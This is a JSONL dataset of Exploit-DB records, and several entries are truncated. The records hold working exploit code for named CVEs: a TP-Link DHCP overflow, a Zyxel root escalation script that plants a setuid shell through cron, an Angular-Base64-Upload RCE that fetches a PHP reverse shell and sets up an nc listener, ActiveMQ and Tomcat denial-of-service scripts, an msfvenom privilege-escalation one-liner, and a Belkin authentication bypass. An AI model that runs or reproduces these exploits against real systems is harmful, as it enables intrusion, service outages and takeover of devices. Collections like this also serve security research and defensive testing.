hangs the =\npipe server might be dead.\\n\");\n\n WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER);\n }\n\n pipe_mode =3D PIPE_READMODE_BYTE;\n result =3D SetNamedPipeHandleState(*handle_ptr, &pipe_mode, NULL, NULL);\n\n if (!result) {\n printf(\"[-] failed setting pipe read mode\\n\");\n print_error(GetLastError());\n return result;\n }\n\n return result;\n}\n\nint main(int argc, char* argv[]) {\n\n HANDLE pipe_handle =3D NULL;\n unsigned char message[8] =3D { 0x00 };\n unsigned char buffer[BUFFER_SIZE] =3D { 0x00 };\n BOOL result =3D FALSE;\n unsigned long bytes_read, bytes_written;\n unsigned int cmd_index =3D 0;\n unsigned int offset =3D 30;\n\n if (argc < 3) {\n printf(\"usage: %s \\n\", argv[0]);\n printf(\"offset - optional: default is 30 - change as needed\\n\");\n printf(\"commands:\\n\");\n printf(\"\\t1 - disconnect all clients\\n\");\n printf(\"\\t2 - get client list\\n\");\n printf(\"\\t3 - shutdown server\\n\");\n printf(\"\\t4 - get server info\\n\");\n printf(\"\\t5 - get server config\\n\");\n printf(\"example pipes:\\n\\t\\\\\\\\192.168.1.42\\\\pipe\\\\TightVNC_Service_Cont=\nrol\\n\");\n printf(\"\\t\\\\\\\\.\\\\pipe\\\\TightVNC_Application_Control_On_Session1\\n\\n\");\n return 0;\n }\n\n char* stop =3D NULL;\n cmd_index =3D strtol(argv[1], &stop, 10);\n\n if (stop =3D=3D '\\0') {\n return 0;\n }\n\n cmd_index--;\n\n if (argc =3D=3D 4) {\n stop =3D NULL;\n offset =3D strtol(argv[3], &stop, 10);\n\n if (offset =3D=3D 0 || stop =3D=3", "cve_id": "CVE-2024-42049", "source": "exploitdb", "timestamp": "2025-06-09T00:00:00+00:00"} {"id": "b9994c5abb51cc5014d5", "text": "TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow\n\n/*\n * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow\n * Date: 10/20/2024\n * Exploit Author: Mohamed Maatallah\n * Vendor Homepage: https://www.tp-link.com\n * Version: TT_V6.2.1021 (VN020-F3v(T))\n * Tested on: VN020-F3v(T) Router (Hardware Version 1.0)\n * CVE: CVE-2024-11237\n * Category: Remote\n\n * Technical Details:\n * -----------------\n * - Triggers multiple memory corruption vectors in DHCP parsing\n * - Primary vector: Stack overflow via oversized hostname (127 bytes)\n * - Secondary vector: Parser confusion via malformed length fields\n * - Tertiary vector: Vendor specific option parsing edge case\n *\n * Attack Surface:\n * --------------\n * - DHCP service running on port 67\n * - Processes broadcast DISCOVER packets\n * - No authentication required\n * - Affects all routers running VN020 F3v(t) specifically the ones\n * supplied by Tunisie Telecom & Topnet\n *\n * Exploitation Method:\n * ------------------\n * 1. Sends crafted DHCP DISCOVER packet\n * 2. Overflows hostname buffer (64 -> 127 bytes)\n * 3. Corrupts length fields in DHCP options\n * 4. Success = No response (service crash)\n *\n * Build:\n * ------\n * Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly.\n *\n * Usage:\n * ------\n * tplink_dhcp.exe\n\n#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#include \n#include \n#include \n#include \n#include \n#include \n\n#pragma comment(lib, \"ws2_32.lib\")\n\n// Standard DHCP ports - Server listens on 67, clients send from 68\n#define DHCP_SERVER_PORT 67\n#define DHCP_CLIENT_PORT 68\n#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet\n#define MAX_ATTEMPTS 3\n\n// Forward declarations of functions\nvoid create_dhcp_discover_packet(unsigned char* packet, int* packet_length);\nvoid add_option(unsigned char* packet, int* offset, unsigned char option,\n unsigned char length, unsigned char* data);\nvoid tp_link(unsigned char* packet, int* offset);\nvoid print_packet_hex(unsigned char* packet, int length);\nint wait_for_response(SOCKET sock, int timeout);\n\nint main() {\n WSADATA wsa;\n SOCKET sock;\n struct sockaddr_in dest;\n unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet\n int packet_length = 0; // Length of constructed packet\n int attempts = 0; // Counter for send attempts\n int success = 0;\n\n\n printf(\"[TP-Thumper] Initializing Winsock...\\n\");\n if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {\n printf(\"[TP-Thumper] Winsock initialization failed. Error: %d\\n\",\n WSAGetLastError());\n return 1;\n }\n\n sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if (sock == INVALID_SOCKET) {\n printf(\"[TP-Thumper] Could not create socket. Error: %d\\n\",\n WSAGetLastError());\n WSACleanup();\n return 1;\n }\n\n // Set up broadcast address (255.255.255.255)\n dest.sin_family = AF_INET;\n dest.sin_port = htons(DHCP_SERVER_PORT);\n dest.sin_addr.s_addr = inet_addr(\"255.255.255.255\");\n\n // Enable broadcast mode on socket\n BOOL broadcast = TRUE;\n if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast,\n sizeof(broadcast)) < 0) {\n printf(\"[TP-Thumper] Broadcast mode failed.\\n\");\n closesocket(sock);\n WSACleanup();\n return 1;\n }\n\n srand((unsigned int)time(NULL));\n\n // Create the DHCP DISCOVER packet\n create_dhcp_discover_packet(packet, &packet_length);\n\n // Main attempt loop - tries to send packet MAX_ATTEMPTS times\n while (attempts < MAX_ATTEMPTS && !success) {\n printf(\"[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\\n\",\n attempts + 1, MAX_ATTEMPTS);\n print_packet_hex(packet, packet_length); //debug\n\n // Send the packet\n if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest,\n sizeof(dest)) < 0) {\n printf(\"[TP-Thumper] Packet send failed. Error: %d\\n\", WSAGetLastError());\n }\n else {\n printf(\"[TP-Thumper] Packet sent. Waiting for router response...\\n\");\n if (wait_for_response(sock, 10)) {\n printf(\n \"[TP-Thumper] Router responded! Exploit may not have succeeded.\\n\");\n success = 1;\n }\n else {\n printf(\"[TP-Thumper] No response received within timeout.\\n\");\n }\n }\n attempts++;\n }\n if (!success) {\n printf(\n \"[TP-Thumper] Exploit succeeded: No router response after %d \"\n \"attempts.\\n\",\n MAX_ATTEMPTS);\n }\n else {\n printf(\"[TP-Thumper] Exploit failed: Router responded within timeout.\\n\");\n }\n\n // Cleanup\n closesocket(sock);\n WSACleanup();\n return 0;\n}\n/*\n * DHCP Message Format:\n * [0x00]: op = 0x01 ; BOOTREQUEST\n * [0x01]: htype = 0x01 ; Ethernet\n * [0x02]: hlen", "cve_id": "CVE-2024-11237", "source": "exploitdb", "timestamp": "2025-05-13T00:00:00+00:00"} {"id": "19735c8b01df5483eb6a", "text": "Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation\n\n# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation\n# Date: 2025-04-23\n# Exploit Author: Marco Ivaldi\n# Vendor Homepage: https://www.zyxel.com/\n# Version: Zyxel uOS V1.31 (see\nhttps://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=\n=3D\nadvisory-for-incorrect-permission-assignment-and-improper-privilege-managem=\n=3D\nent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)\n# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel\nFLEX200H with Firmware V1.31(ABWV.0)\n# CVE: CVE-2025-1731\n\n#!/bin/sh\n\n#\n# raptor_fermion - Zyxel fermion-wrapper root LPE exploit\n# Copyright (c) 2025 Marco Ivaldi \n#\n# \"So we wait, this is our labour... we wait.\"\n# -- Anthony Swofford on fuzzing\n#\n# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by\n# Zyxel with some of their appliances follows symbolic links in the `/tmp`\n# directory when run with the `register-status` argument. This allows local\n# users with access to a Linux OS shell to trick the program into creating\n# writable files at arbitrary locations in the filesystem. This vulnerability\n# can be exploited to overwrite arbitrary files or locally escalate privileges\n# from low-privileged user (e.g., `postgres`) to root.\n#\n# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies\n# exploitation of this vulnerability and may also cause all sorts of havoc.\n#\n# ## Vulnerability information\n#\n# * CVE ID - CVE-2025-1731\n# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html\n#\n# ## Relevant links\n#\n# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt\n# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\n# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732\n# * https://security.humanativaspa.it/tag/zyxel/\n#\n# ## Usage example\n#\n# ```\n# $ ./raptor_fermion\n# raptor_fermion - Zyxel fermion-wrapper root LPE exploit\n# Copyright (c) 2025 Marco Ivaldi \n#\n# [*] Exploiting /usr/sbin/fermion-wrapper\n# $ uname -a\n# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux\n# $ id\n# uid=502(postgres) gid=502(postgres) groups=502(postgres)\n# $ ls -l /usr/sbin/fermion-wrapper\n# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper\n# {\"status\": 0, \"registered\": 1, \"nebula_registered\": 1, \"bundle\": 1}\n#\n# [+] Everything looks good \\o/, wait an hour and check /tmp/pwned\n# $ ls -l /etc/cron.d/runme\n# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme\n# $ cat /etc/cron.d/runme\n# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme\n#\n# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p\n#\n# [about one hour later...]\n#\n# $ ls -l /tmp/pwned\n# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned\n# $ /tmp/pwned -p\n# # id\n# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)\n# # R00t D4nc3!!!111! \\o/\n# ```\n#\n# ## Tested on\n#\n# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47\n# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31\n#\n# *Note: other products and firmware versions may also be vulnerable.*\n#\n# ## Special thanks\n#\n# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices\n#\n\necho \"raptor_fermion - Zyxel fermion-wrapper root LPE exploit\"\necho \"Copyright (c) 2025 Marco Ivaldi \"\necho\n\ntarget=\"/usr/sbin/fermion-wrapper\"\ntmpfile=\"/tmp/register_status\"\nrunme=\"/etc/cron.d/runme\"\nshell=\"/tmp/pwned\"\n\necho \"[*] Exploiting $target\"\necho \"$ uname -a\"\nuname -a\necho \"$ id\"\nid\necho \"$ ls -l $target\"\nls -l $target\n\numask 0\nrm $tmpfile\nln -s $runme /tmp/register_status\n$target register-status\necho \"* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme\" > $runme\n\nif [ \"`cat $runme 2>/dev/null`\" = \"\" ]; then\n\techo \"[!] Error: something went wrong ¯\\\\_(ツ)_/¯\"\n\texit 1\nfi\n\necho\necho \"[+] Everything looks good \\\\o/, wait an hour and check $shell\"\necho \"$ ls -l $runme\"\nls -l $runme\necho \"$ cat $runme\"\ncat $runme\n\necho\necho \"[+] Run the shell as follows to bypass bash checks: $shell -p\"\necho", "cve_id": "CVE-2025-1731", "source": "exploitdb", "timestamp": "2025-05-18T00:00:00+00:00"} {"id": "5e936083a4b7df514b63", "text": "Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)\n\n# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)\n# Date: 10 October 2024\n# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)\n# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)\n# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload\n# Software Link: https://github.com/adonespitogo/angular-base64-upload\n# Version: prior to v0.1.21\n# Tested on: Arch Linux\n# CVE : CVE-2024-42640\n# Severity: Critical - 10.0 (CVSS 4.0)\n# Github Link : https://github.com/rvizx/CVE-2024-42640\n# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html\n\n# DISCLAIMER:\n\n# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.\n# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.\n# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.\n# Any actions taken with this code are undertaken at the sole discretion and risk of the user.\n# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.\n# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.\n# By using this code, you agree to assume all responsibility and liability for your actions.\n# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.\n# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.\n# Proceed with caution and use this code responsibly.\n\n#!/bin/python3\n\nimport re\nimport subprocess\nimport requests\nimport sys\nimport os\nimport uuid\nimport base64\n\n\ndef banner():\n print('''\n\n \\033[2mCVE-2024-42640\\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \\033[2m PoC Exploit\n \\033[0mRavindu Wickramasinghe\\033[2m | rvz (ラヴィズ) - twitter: @rvizx9\n https://github.com/rvizx/\\033[0mCVE-2024-42640\n\n''')\n\n\ndef enum(url):\n print(\"\\033[94m[inf]:\\033[0m enumerating for dependency installtion directories... \")\n target = f\"{url}/bower_components/angular-base64-upload/demo/index.html\"\n r = requests.head(target)\n if r.status_code == 200:\n print(\"\\033[94m[inf]:\\033[0m target is using bower_components\")\n else:\n print(\"\\033[94m[inf]:\\033[0m target is not using bower_components\")\n target = f\"{url}/node_modules/angular-base64-upload/demo/index.html\"\n r = requests.head(target)\n if r.status_code == 200:\n print(\"\\033[94m[inf]:\\033[0m target is using node_modules\")\n else:\n print(\"\\033[94m[inf]:\\033[0m target is not using node_modules\")\n print(\"\\033[91m[err]:\\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html\")\n print(\"\\033[93m[ins]:\\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory\")\n print(\"\\033[93m[ins]:\\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html\")\n print(\"\\033[91m[err]:\\033[0m exiting..\")\n exit()\n\n version = next((line for line in requests.get(target.replace(\"demo/index.html\",\"CHANGELOG.md\")).text.splitlines() if 'v0' in line), None)\n print(\"\\033[94m[inf]:\\033[0m angular-base64-upload version: \",version)\n exploit(target)\n\n\n\n\n\ndef exploit(target):\n print(f\"[dbg]: {target}\")\n target_server_url = target.replace(\"index.html\",\"server.php\")\n print(f\"[dbg]: {target_server_url}\")\n payload_url = \"https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\"\n print(\"\\033[94m[inf]:\\033[0m generating a php reverse shell to upload..\")\n ip = input(\"\\033[93m[ins]:\\033[0m enter listener ip / domain: \")\n port = input(\"\\033[93m[ins]:\\033[0m enter listenter port: \")\n print(f\"\\033[93m[ins]:\\033[0m start a listener, execute nc -lvnp {port}\")\n input(\"\\033[93m[ins]:\\033[0m press enter to continue...\")\n print(\"\\033[94m[inf]:\\033[0m downloading php-reverse-shell from github/pentestmonkey...\")\n response = requests.get(payload_url)\n if response.status_code == 200:\n php_code = response.text.replace(\"127.0.0.1\", ip).replace(\"1234\", port) # replacing default values with user input\n payload_name = str(uuid.uuid4())+\".php\" # using a uuid for payload name\n with open(payload_name, \"w\") as file:\n file.write(php_code)\n else:\n print(\"\\033[91m[err]:\\033[0m failed to fetch the php-reverse-shell.\")\n print(\"\\033[91m[err]:\\033[0m exiting..\")\n exit()\n\n with open(payload_name, 'rb') as file:\n file_content = file.read()\n base64_payload = bas", "cve_id": "CVE-2024-42640", "source": "exploitdb", "timestamp": "2025-04-04T00:00:00+00:00"} {"id": "878df119f53636ca9111", "text": "Apache ActiveMQ 6.1.6 - Denial of Service (DOS)\n\n# Exploit Title: Apache ActiveMQ 6.1.6 - Denial of Service (DOS)\n# Date: 2025-05-9\n# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)\n# Github: https://github.com/absholi7ly/CVE-2025-27533-Exploit-for-Apache-ActiveMQ\n# CVE: CVE-2025-27533\n\nimport socket\nimport struct\nimport time\nimport datetime\nimport threading\nimport requests\nimport argparse\nimport random\nfrom colorama import init, Fore\nfrom tabulate import tabulate\nfrom tqdm import tqdm\nfrom concurrent.futures import ThreadPoolExecutor\n\ninit()\n\ndef print_banner():\n banner = f\"\"\"\n{Fore.CYAN}============================================================\n CVE-2025-27533 Exploit PoC - Apache ActiveMQ DoS\n============================================================\n{Fore.YELLOW}Developed by: absholi7ly\n{Fore.CYAN}============================================================{Fore.RESET}\n \"\"\"\n print(banner)\n\ndef _check_server_availability(host, port, admin_port=8161, timeout=2):\n \"\"\"Internal function to check server availability\"\"\"\n tcp_reachable = False\n admin_reachable = False\n\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(timeout)\n sock.connect((host, port))\n sock.close()\n tcp_reachable = True\n except (socket.timeout, ConnectionRefusedError):\n pass\n\n try:\n response = requests.get(f\"http://{host}:{admin_port}/admin\", timeout=timeout)\n admin_reachable = response.status_code == 200\n except (requests.Timeout, requests.ConnectionError):\n pass\n\n return tcp_reachable, admin_reachable\n\ndef check_server_availability(host, port, admin_port=8161, timeout=2, retries=5):\n for _ in range(retries):\n tcp_reachable, admin_reachable = _check_server_availability(host, port, admin_port, timeout)\n if not tcp_reachable:\n return False, admin_reachable\n time.sleep(0.5)\n return True, admin_reachable\n\ndef parse_hex_or_int(value):\n try:\n if value.startswith('0x') or value.startswith('0X'):\n return int(value, 16)\n return int(value)\n except ValueError:\n raise ValueError(f\"Invalid integer or hex value: {value}\")\n\ndef create_malicious_packet(buffer_size=0x1E00000, packet_id=1):\n command_type = 0x01\n client_id = f\"EXPLOIT-PACKET-{packet_id:04d}\".encode()\n version = 12\n\n packet = bytearray()\n packet += b'\\x00\\x00\\x00\\x00'\n packet += struct.pack(\"B\", command_type)\n packet += struct.pack(\">I\", len(client_id))\n packet += client_id\n packet += struct.pack(\">I\", version)\n packet += struct.pack(\">I\", buffer_size)\n packet += bytes(random.randint(0, 255) for _ in range(50))\n\n packet_length = len(packet) - 4\n packet[0:4] = struct.pack(\">I\", packet_length)\n\n return packet\n\ndef send_single_packet(host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event):\n if stop_event.is_set():\n return\n\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-3]\n tcp_reachable, admin_reachable = check_server_availability(host, port)\n status = f\"TCP: {'Up' if tcp_reachable else 'Down'}, Admin: {'Up' if admin_reachable else 'Down'}\"\n local_port = \"N/A\"\n connection_status = \"Success\"\n\n max_connect_retries = 5\n for connect_attempt in range(max_connect_retries):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(5)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n\n try:\n sock.connect((host, port))\n local_port = sock.getsockname()[1]\n print(f\"{Fore.GREEN}[+] Connected to {host}:{port} (Packet {packet_num}/{total_packets}, Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}\")\n\n max_retries = 3\n for attempt in range(max_retries):\n try:\n sock.send(packet)\n print(f\"{Fore.CYAN}[*] Sent Packet {packet_num}/{total_packets} (Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}\")\n try:\n response = sock.recv(2048)\n response_len = len(response)\n connection_status = f\"Success (Response: {response_len} bytes)\"\n except:\n connection_status = \"Success (No Response)\"\n break\n except socket.error as e:\n connection_status = f\"Failed: {str(e)}\"\n if attempt < max_retries - 1:\n print(f\"{Fore.YELLOW}[-] Failed to send Packet {packet_num}/{total_packets} (Attempt {attempt+1}, Port: {local_port}): {e}. Retrying...{Fore.RESET}\"", "cve_id": "CVE-2025-27533", "source": "exploitdb", "timestamp": "2025-05-09T00:00:00+00:00"} {"id": "3762563ff338fae8a404", "text": "Apache Tomcat 10.1.39 - Denial of Service (DoS)\n\n# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS)\n# Author: Abdualhadi khalifa\n# CVE: CVE-2025-31650\n\nimport httpx\nimport asyncio\nimport random\nimport urllib.parse\nimport sys\nimport socket\nfrom colorama import init, Fore, Style\n\ninit()\n\nclass TomcatKiller:\n def __init__(self):\n self.success_count = 0\n self.error_count = 0\n self.invalid_priorities = [\n \\\\\\\"u=-1, q=2\\\\\\\",\n \\\\\\\"u=4294967295, q=-1\\\\\\\",\n \\\\\\\"u=-2147483648, q=1.5\\\\\\\",\n \\\\\\\"u=0, q=invalid\\\\\\\",\n \\\\\\\"u=1/0, q=NaN\\\\\\\",\n \\\\\\\"u=1, q=2, invalid=param\\\\\\\",\n \\\\\\\"\\\\\\\",\n \\\\\\\"u=1, q=1, u=2\\\\\\\",\n \\\\\\\"u=99999999999999999999, q=0\\\\\\\",\n \\\\\\\"u=-99999999999999999999, q=0\\\\\\\",\n \\\\\\\"u=, q=\\\\\\\",\n \\\\\\\"u=1, q=1, malformed\\\\\\\",\n \\\\\\\"u=1, q=, invalid\\\\\\\",\n \\\\\\\"u=-1, q=4294967295\\\\\\\",\n \\\\\\\"u=invalid, q=1\\\\\\\",\n \\\\\\\"u=1, q=1, extra=\\\\\\\",\n \\\\\\\"u=1, q=1; malformed\\\\\\\",\n \\\\\\\"u=1, q=1, =invalid\\\\\\\",\n \\\\\\\"u=0, q=0, stream=invalid\\\\\\\",\n \\\\\\\"u=1, q=1, priority=recursive\\\\\\\",\n \\\\\\\"u=1, q=1, %invalid%\\\\\\\",\n \\\\\\\"u=0, q=0, null=0\\\\\\\",\n ]\n\n async def validate_url(self, url):\n try:\n parsed_url = urllib.parse.urlparse(url)\n if not parsed_url.scheme or not parsed_url.hostname:\n raise ValueError(\\\\\\\"Invalid URL format. Use http:// or https://\\\\\\\")\n host = parsed_url.hostname\n port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\\\\'https\\\\\\' else 80)\n return host, port\n except Exception:\n print(f\\\\\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\\\\\")\n sys.exit(1)\n\n async def check_http2_support(self, host, port):\n async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:\n try:\n response = await client.get(f\\\\\\\"https://{host}:{port}/\\\\\\\", headers={\\\\\\\"user-agent\\\\\\\": \\\\\\\"TomcatKiller\\\\\\\"})\n if response.http_version == \\\\\\\"HTTP/2\\\\\\\":\n print(f\\\\\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\\\\\")\n return True\n else:\n print(f\\\\\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\\\\\")\n return False\n except Exception:\n print(f\\\\\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\\\\\")\n return False\n\n async def send_invalid_priority_request(self, host, port, num_requests, task_id):\n async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:\n url = f\\\\\\\"https://{host}:{port}/\\\\\\\"\n for i in range(num_requests):\n headers = {\n \\\\\\\"priority\\\\\\\": random.choice(self.invalid_priorities),\n \\\\\\\"user-agent\\\\\\\": f\\\\\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\\\\\",\n \\\\\\\"cache-control\\\\\\\": \\\\\\\"no-cache\\\\\\\",\n \\\\\\\"accept\\\\\\\": f\\\\\\\"*/*; q={random.random()}\\\\\\\",\n }\n try:\n await client.get(url, headers=headers)\n self.success_count += 1\n except Exception:\n self.error_count += 1\n\n async def monitor_server(self, host, port):\n while True:\n try:\n with socket.create_connection((host, port), timeout=2):\n print(f\\\\\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\\\\\")\n except Exception:\n print(f\\\\\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\\\\\")\n break\n await asyncio.sleep(2)\n\n async def run_attack(self, host, port, num_tasks, requests_per_task):\n print(f\\\\\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\\\\\")\n print(f\\\\\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\\\\\")\n print(f\\\\\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\\\\\")\n\n monitor_task = asyncio.create_task(self.monitor_server(host, port))\n tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]\n await asyncio.gather(*tasks)\n monitor_task.cancel()\n\n total_requests = num_tasks * requests_per_task\n success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0\n print(f\\\\\\\"\\\\\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\\\\\")\n print(f\\\\\\\"Target: {host}:{port}\\", "cve_id": "CVE-2025-31650", "source": "exploitdb", "timestamp": "2025-06-05T00:00:00+00:00"} {"id": "a92bb2f138078a439a61", "text": "Automic Agent 24.3.0 HF4 - Privilege Escalation\n\n# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation\n# Date: 26.05.2025\n# Exploit Author: Flora Schäfer\n# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation\n# Version: <24.3.0 HF4, <21.0.13 HF1\n# Tested on: Linux\n# CVE : CVE-2025-4971\n\n1. Generate shared object file using msfvenom\n$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD=\"/bin/sh\" -f elf-so > /tmp/sh.so\n\n2. Run the ucxjlx6 executable as follows\n$ ./ucxjlx6 ini=<(echo -e \"[GLOBAL]\\nhelplib = /dev/null\\nsystem = blep\\n[MISC]\\nauthentication = PAM\\n[PAM]\\nlibName = /tmp/sh.so\\n[VARIABLES]\\nUC_EX_JOB_MD=blep\")", "cve_id": "CVE-2025-4971", "source": "exploitdb", "timestamp": "2025-05-29T00:00:00+00:00"} {"id": "a9b4520aac052c110dd1", "text": "Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials\n\n/*\n * Title : Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials\n * Author : Byte Reaper\n * CVE : CVE-2025-8730\n * Description : Exploit demonstrating an authentication bypass vulnerability\n * in the web interface of Belkin F9K1009 and F9K1010 routers. The flaw resides\n * in improper session validation logic, allowing remote attackers to gain\n * unauthorized access to the administrative panel without supplying valid credentials.\n */\n\n\n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#define FULL 2000\n#define LOGIN_POST 1500\n\nconst char *nameFileC = NULL;\nint verbose = 0;\nconst char *router = NULL;\nconst char *cookies = NULL;\nint uC = 0;\nconst char *fullurl = NULL;\nint sleepS = 0;\nint count = 0;\nvoid exitSyscall()\n{\n __asm__ volatile\n (\n \"mov $0x3C, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n :\"rax\",\n \"rdi\"\n );\n}\nint checkLen(int len, char *buf, size_t bufcap)\n{\n if (len < 0 || (size_t)len >= bufcap)\n {\n printf(\"\\e[0;31m[-] Len is Long ! \\e[0m\\n\");\n printf(\"\\e[0;31m[-] Len %d\\e[0m\\n\", len);\n exitSyscall();\n return 1;\n }\n else\n {\n printf(\"\\e[0;34m[+] Len Is Not Long (%d).\\e[0m\\n\",len);\n return 0;\n\n }\n return 0;\n}\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\n\nsize_t write_cb(void *ptr,\n size_t size,\n size_t nmemb,\n void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n fprintf(stderr, \"\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n\");\n exitSyscall();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\nconst char *wordLogin[] =\n{\n \"login_success\",\n \"Welcome\",\n \"Dashboard\",\n \"admin panel\",\n \"Set-Cookie\",\n \"Authorization\",\n \"token\",\n \"sessionid\",\n \"redirect\",\n \"access granted\",\n \"authenticated\",\n \"user authenticated\",\n \"login ok\",\n \"login complete\",\n \"login status=success\",\n \"login=1\",\n \"auth=1\",\n \"valid credentials\",\n \"home.htm\",\n \"main.htm\",\n \"index.htm\",\n \"config.htm\",\n \"firmware.htm\",\n \"admin.htm\",\n NULL\n};\nvoid sleepTime(int sec)\n{\n if (sec <= 0)\n {\n fprintf(stderr, \"\\e[0;31m[-] Value seconds must be > 0 !\\e[0m\\n\");\n exitSyscall();\n }\n\n struct timespec req, rem;\n req.tv_sec = (time_t)sec;\n req.tv_nsec = 0;\n\n printf(\"\\e[0;33m[+] Sleeping for %d seconds...\\e[0m\\n\", sec);\n\n while (nanosleep(&req, 